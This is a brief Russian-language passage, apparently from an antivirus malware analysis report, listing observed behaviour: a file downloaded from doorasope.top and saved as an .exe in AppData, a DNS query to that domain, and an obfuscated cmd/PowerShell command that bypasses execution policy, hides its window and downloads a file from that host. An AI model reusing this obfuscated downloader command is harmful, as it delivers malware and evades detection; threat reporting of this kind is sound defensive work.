Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^wE^rSHeLl.^e^x^e ^-^exe^CU^t^IO^NpOLIC^y b^yp^AS^S^ -Nop^r^O^F^I^L^E^ ^-Windo^ws^tYl^E hI^dd^EN (Ne^W-OBjec^T^ ^SYs^T^Em^.Net.^W^eBcLienT)^.d^oW^n^Lo^a^Df^ilE(^'http://www.dooraso...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "PO^wE^rSHeLl.^e^x^e ^-^exe^CU^t^IO^NpOLIC^y b^yp^AS^S^ -Nop^r^O^F^I^L^E^ ^-Windo^ws^tYl^E hI^dd^EN (Ne^W-OBjec^T^ ^SYs^T^Em^.Net.^W^eBcLienT)^.d^oW^n^Lo^a^Df^ilE(^'http://www.dooraso...' (со скрытым окном)